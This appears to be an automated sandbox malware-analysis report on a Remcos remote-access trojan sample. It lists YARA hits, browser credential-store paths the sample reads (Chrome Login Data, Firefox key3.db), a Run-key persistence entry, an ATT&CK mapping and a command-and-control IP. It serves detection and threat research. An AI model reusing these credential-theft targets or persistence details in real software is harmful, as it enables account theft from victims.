Source: Yara match	File source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2iH7rqx9rQ.exe PID: 2268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 7796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 7828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 2980, type: MEMORYSTR

Contains functionality to steal Chrome passwords or cookies

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	0_2_0040B21B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	23_2_0040B21B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	24_2_0040B21B
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data	35_2_0040B21B

Contains functionality to steal Firefox passwords or cookies

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	0_2_0040B335
Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: \key3.db	0_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	23_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: \key3.db	23_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	24_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: \key3.db	24_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\	35_2_0040B335
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: \key3.db	35_2_0040B335

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-I7G983	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-I7G983
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-I7G983
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Mutex created: \Sessions\1\BaseNamedObjects\Rmc-I7G983

Yara detected Remcos RAT

Source: Yara match	File source: 23.2.yavascript.exe.ae0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.24e0e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.24e0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.yavascript.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.2510e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.2470e67.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.yavascript.exe.2500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.3.yavascript.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.2iH7rqx9rQ.exe.24f0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.3.yavascript.exe.2500000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.2470e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.yavascript.exe.2560000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.2iH7rqx9rQ.exe.24f0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.2.yavascript.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 35.3.yavascript.exe.2560000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.2iH7rqx9rQ.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.yavascript.exe.2510e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 23.2.yavascript.exe.ae0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000023.00000002.1789796940.00000000009FD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1779058445.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2515411294.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1754239939.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 2iH7rqx9rQ.exe PID: 2268, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 7796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 7828, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yavascript.exe PID: 2980, type: MEMORYSTR

Source: C:\Users\user\Desktop\2iH7rqx9rQ.exe	Code function: cmd.exe	0_2_00405042
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: cmd.exe	23_2_00405042
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: cmd.exe	24_2_00405042
Source: C:\Users\user\AppData\Roaming\xenor\yavascript.exe	Code function: cmd.exe	35_2_00405042

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	11 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	1 Windows Service	1 Bypass User Account Control	3 Obfuscated Files or Information	111 Input Capture	1 Account Discovery	Remote Desktop Protocol	111 Input Capture	2 Encrypted Channel	Exfiltration Over Bluetooth	1 Defacement
Email Addresses	DNS Server	Domain Accounts	2 Service Execution	11 Registry Run Keys / Startup Folder	1 Access Token Manipulation	12 Software Packing	2 Credentials In Files	1 System Service Discovery	SMB/Windows Admin Shares	3 Clipboard Data	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Windows Service	1 DLL Side-Loading	NTDS	3 File and Directory Discovery	Distributed Component Object Model	Input Capture	1 Remote Access Software	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	21 Process Injection	1 Bypass User Account Control	LSA Secrets	23 System Information Discovery	SSH	Keylogging	1 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Registry Run Keys / Startup Folder	1 Masquerading	Cached Domain Credentials	141 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Virtualization/Sandbox Evasion	DCSync	2 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	1 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	21 Process Injection	/etc/passwd and /etc/shadow	1 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
2iH7rqx9rQ.exe	57%	Virustotal		Browse
2iH7rqx9rQ.exe	76%	ReversingLabs	Win32.Trojan.Remcos
2iH7rqx9rQ.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\xenor\yavascript.exe	76%	ReversingLabs	Win32.Trojan.Remcos
C:\Users\user\AppData\Roaming\xenor\yavascript.exe	57%	Virustotal		Browse

Name	IP	Active	Malicious	Antivirus Detection	Reputation
bg.microsoft.map.fastly.net	199.232.214.172	true	false		high
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	217.20.57.36	true	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
http://geoplugin.net/json.gp	yavascript.exe	false	high
http://upx.sf.net	Amcache.hve.9.dr	false	high
http://geoplugin.net/json.gp/C	2iH7rqx9rQ.exe, 00000000.00000003.1299824966.00000000024F0000.00000004.00001000.00020000.00000000.sdmp, 2iH7rqx9rQ.exe, 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, 2iH7rqx9rQ.exe, 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, yavascript.exe, 00000017.00000002.2513858594.0000000000400000.00000040.00000001.01000000.00000006.sdmp, yavascript.exe, 00000017.00000003.1453393185.0000000002500000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000017.00000002.2514858841.0000000000AE0000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 00000018.00000002.1779145028.0000000002510000.00000040.00001000.00020000.00000000.sdmp, yavascript.exe, 00000018.00000002.1778751357.0000000000400000.00000040.00000001.01000000.00000006.sdmp, yavascript.exe, 00000018.00000003.1454164978.0000000002590000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000023.00000003.1528824074.0000000002560000.00000004.00001000.00020000.00000000.sdmp, yavascript.exe, 00000023.00000002.1788896834.0000000000400000.00000040.00000001.01000000.00000006.sdmp, yavascript.exe, 00000023.00000002.1790357111.00000000024E0000.00000040.00001000.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
198.23.227.212	unknown	United States		36352	AS-COLOCROSSINGUS	true

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588952
Start date and time:	2025-01-11 07:35:12 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	40
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	2iH7rqx9rQ.exe renamed because original name is a hash value
Original Sample Name:	ed1416c90a49177106cbea5b7551756e06fee46d77fde4879b8735ec56dd54b4.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.winEXE@18/55@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 96% Number of executed functions: 14 Number of non-executed functions: 382
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, SIHClient.exe, SgrmBroker.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 199.232.214.172, 52.168.117.173, 13.107.246.45, 20.12.23.50, 40.126.31.73
Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, ctldl.windowsupdate.com.delivery.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, time.windows.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
03:02:51	API Interceptor	2x Sleep call for process: WerFault.exe modified
03:03:00	API Interceptor	385013x Sleep call for process: yavascript.exe modified
07:36:13	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Rmc-I7G983 "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"
07:36:23	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Rmc-I7G983 "C:\Users\user\AppData\Roaming\xenor\yavascript.exe"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
198.23.227.212	Wk731bq71c.exe	Get hash	malicious	Remcos	Browse
	yPIOW6yoPi.exe	Get hash	malicious	Remcos	Browse
	requests-pdf.exe	Get hash	malicious	Remcos	Browse
	E84Ddy7gSh.exe	Get hash	malicious	Remcos	Browse
	advancePayment-pdf.exe	Get hash	malicious	Remcos	Browse
	YESOHDKMIm.exe	Get hash	malicious	Remcos	Browse
	NujUXO42Rg.exe	Get hash	malicious	Remcos	Browse
	ZeaS4nUxg4.exe	Get hash	malicious	Remcos	Browse
	documents-pdf.exe	Get hash	malicious	Remcos	Browse
	1kZ9olJiaG.exe	Get hash	malicious	Remcos	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com	369248682699819312.js	Get hash	malicious	Strela Downloader	Browse	217.20.57.36
	11626244731900027402.js	Get hash	malicious	Strela Downloader	Browse	217.20.57.21
	1554336511338510086.js	Get hash	malicious	Strela Downloader	Browse	84.201.210.37
	3107622714995924320.js	Get hash	malicious	Strela Downloader	Browse	84.201.210.23
	709291801716322197.js	Get hash	malicious	Strela Downloader	Browse	84.201.210.23
	244312574730704684.js	Get hash	malicious	Strela Downloader	Browse	217.20.57.18
	12071652839003777.js	Get hash	malicious	Strela Downloader	Browse	217.20.57.20
	13134167581645321294.js	Get hash	malicious	Strela Downloader	Browse	217.20.57.18
	2227274219703378.js	Get hash	malicious	Strela Downloader	Browse	217.20.57.18
	1383920648257922108.js	Get hash	malicious	Strela Downloader	Browse	217.20.57.36
bg.microsoft.map.fastly.net	244188544238313090.js	Get hash	malicious	Strela Downloader	Browse	199.232.214.172
	23742400475728052.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	19292830865508482.js	Get hash	malicious	Strela Downloader	Browse	199.232.214.172
	369248682699819312.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	32279194341766111087.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	11626244731900027402.js	Get hash	malicious	Strela Downloader	Browse	199.232.214.172
	1194187433219817322.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	2650280751468214741.js	Get hash	malicious	Strela Downloader	Browse	199.232.214.172
	497524953288097419.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	3244127882174020209.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AS-COLOCROSSINGUS	M6MafKT2pj.exe	Get hash	malicious	Remcos	Browse	192.3.64.152
	rZcI2tz327.exe	Get hash	malicious	Remcos	Browse	192.210.150.26
	Wk731bq71c.exe	Get hash	malicious	Remcos	Browse	198.23.227.212
	yPIOW6yoPi.exe	Get hash	malicious	Remcos	Browse	198.23.227.212
	C2R7VV2QmG.exe	Get hash	malicious	Remcos	Browse	192.210.150.26
	8kjlHXmbAY.exe	Get hash	malicious	Remcos	Browse	192.210.150.26
	OKkUGRkZV7.exe	Get hash	malicious	Remcos	Browse	192.3.64.152
	NssBkEQKsI.exe	Get hash	malicious	Remcos	Browse	192.210.150.26
	l1QC9H0SNR.exe	Get hash	malicious	Remcos	Browse	192.210.150.26
	MLxloAVuCZ.exe	Get hash	malicious	Remcos	Browse	192.3.64.152

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_23a1efeea024534baba17aaad5d4a4863389c7d_82a4bb13_3482be79-b869-454c-820b-8e07f6271646\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	modified
Size (bytes):	65536
Entropy (8bit):	1.0047078594574854
Encrypted:	false
SSDEEP:	192:8RXHF60ORbSjvDZr6bedzuiFXZ24IO8KEw:YFBORbSjLzuiFXY4IO8K
MD5:	2772BA355445E03203D8D0DDF7DF6700
SHA1:	8A72E4A5FDDBB217F5004507623374EA94B82405
SHA-256:	A3C1B603865170463F4E7F9D5D825CC4A5011373D4F1F68DBF8E37356967968C
SHA-512:	348F5BA0A9F17B3676C62655CF8485A5D07FCD31D65C9B683CC138FAC0B03457D8352176E87325B646756C03D7176B3F94FA662DF769E336477CB56243657573
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.0.9.8.4.5.5.5.5.7.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.8.1.0.5.0.9.8.7.6.4.9.3.1.8.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.4.8.2.b.e.7.9.-.b.8.6.9.-.4.5.4.c.-.8.2.0.b.-.8.e.0.7.f.6.2.7.1.6.4.6.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.a.1.c.9.9.2.1.-.8.5.9.d.-.4.7.c.e.-.a.f.1.6.-.c.1.1.1.d.6.7.d.f.5.8.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.i.H.7.r.q.x.9.r.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.c.-.0.0.0.1.-.0.0.1.4.-.2.8.3.5.-.5.e.1.9.f.3.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.7.5.8.9.1.b.0.8.6.9.5.a.c.2.5.3.2.e.d.7.a.7.2.4.5.e.6.e.8.1.5.0.0.0.0.1.5.0.6.!.0.0.0.0.8.5.4.8.d.7.7.5.b.3.4.7.5.7.0.4.d.f.e.3.6.e.3.0.d.3.b.f.1.1.5.d.8.9.6.4.3.3.0.c.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_8643f1cd2c1d2784ead29abf2402e836c9571c_82a4bb13_1ae3fb9f-3fa1-4def-a763-351f8d175778\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9273717071924794
Encrypted:	false
SSDEEP:	192:/JHAe056rYjvDZr6rzuiF8Z24IO8KEwi:/ZAF56rYjuzuiF8Y4IO8K
MD5:	76E83CDFD59727532F3CDFE30FBD3F33
SHA1:	6A48822027FE7E4504B21A0518A748C1B4E26BED
SHA-256:	822C7FE0B0648F48933F7ABA618B7D02235F33138DCDD2292DA53359DEAC8098
SHA-512:	055BC3B4AFA539AA657C17977E05B5BFE0AC7FE6D4333D4ECADDD40C3F2A1D9AF976A53363774B025602FECDDF45CB0E94905FE608D0D51A8F12B83DBA07BCF7
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.0.9.7.7.1.7.2.5.4.3.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.a.e.3.f.b.9.f.-.3.f.a.1.-.4.d.e.f.-.a.7.6.3.-.3.5.1.f.8.d.1.7.5.7.7.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.9.c.3.4.1.9.-.7.0.2.b.-.4.e.6.8.-.b.3.7.a.-.0.9.b.0.6.8.3.d.5.d.8.2.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.i.H.7.r.q.x.9.r.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.c.-.0.0.0.1.-.0.0.1.4.-.2.8.3.5.-.5.e.1.9.f.3.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.7.5.8.9.1.b.0.8.6.9.5.a.c.2.5.3.2.e.d.7.a.7.2.4.5.e.6.e.8.1.5.0.0.0.0.1.5.0.6.!.0.0.0.0.8.5.4.8.d.7.7.5.b.3.4.7.5.7.0.4.d.f.e.3.6.e.3.0.d.3.b.f.1.1.5.d.8.9.6.4.3.3.0.c.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_8643f1cd2c1d2784ead29abf2402e836c9571c_82a4bb13_3574e9e7-ccf8-441b-8b34-1c1bd3b79548\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.927555950186788
Encrypted:	false
SSDEEP:	96:8MqHo1sg0/oA7JfGQXIDcQnc6rCcEhcw3r56O+HbHg/8BRTf32rLOyKZoxmftZrK:4Hae056rYjvDZr6rzuiFXZ24IO8KEw
MD5:	AFAB58F1192362645E565E1DF8B41740
SHA1:	4B572906B38AB9112E9E5D0CE99EB700A2B0CF62
SHA-256:	DDD1F5D371E0B9BC6E13ECCFA1D74C663F5B81F4F74E292F46F1FD89751AA682
SHA-512:	0472D5D27B03B418BA67ED53EA0E82E93468906B4AFE32ACB9DCA49592AC3C894EB5B2BAE420A95E38C49139500CCC255FA29C1840A7387EE16251FA25684CC9
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.8.1.0.5.0.9.7.8.0.4.8.5.7.8.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.5.7.4.e.9.e.7.-.c.c.f.8.-.4.4.1.b.-.8.b.3.4.-.1.c.1.b.d.3.b.7.9.5.4.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.8.1.f.2.d.a.c.-.b.0.d.2.-.4.3.b.9.-.a.2.8.6.-.2.3.0.e.8.d.a.8.5.4.4.a.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.i.H.7.r.q.x.9.r.Q...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.8.d.c.-.0.0.0.1.-.0.0.1.4.-.2.8.3.5.-.5.e.1.9.f.3.6.3.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.7.5.8.9.1.b.0.8.6.9.5.a.c.2.5.3.2.e.d.7.a.7.2.4.5.e.6.e.8.1.5.0.0.0.0.1.5.0.6.!.0.0.0.0.8.5.4.8.d.7.7.5.b.3.4.7.5.7.0.4.d.f.e.3.6.e.3.0.d.3.b.f.1.1.5.d.8.9.6.4.3.3.0.c.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.1././.0.1.:.0.8.:.2.9.:.3.1.!.0.!.2.i.H.7.r.q.x.9.r.Q...e.x.e.....B.o.o.t.I.d.=.4.

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_2iH7rqx9rQ.exe_8643f1cd2c1d2784ead29abf2402e836c9571c_82a4bb13_538e896f-b6d0-4c7e-ba42-c5fa3a74b90e\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9275119121005136
Encrypted:	false
SSDEEP:	96:oi3rHzsg0/oA7JfGQXIDcQnc6rCcEhcw3r56O+HbHg/8BRTf32rLOyKZoxmftZrl:zHze056rYjvDZr6rzuiF8Z24IO8KEw
MD5:	9393F65BDD32D2AE44422DDA5CD6162D
SHA1:	DF593C768E9EB1E48FA2940DA8A3D87C68A2208C
SHA-256:	35E36FFA80F010D6FAC2F58980B479CC57FEFB03F1EB65398F315827FBDF91C5
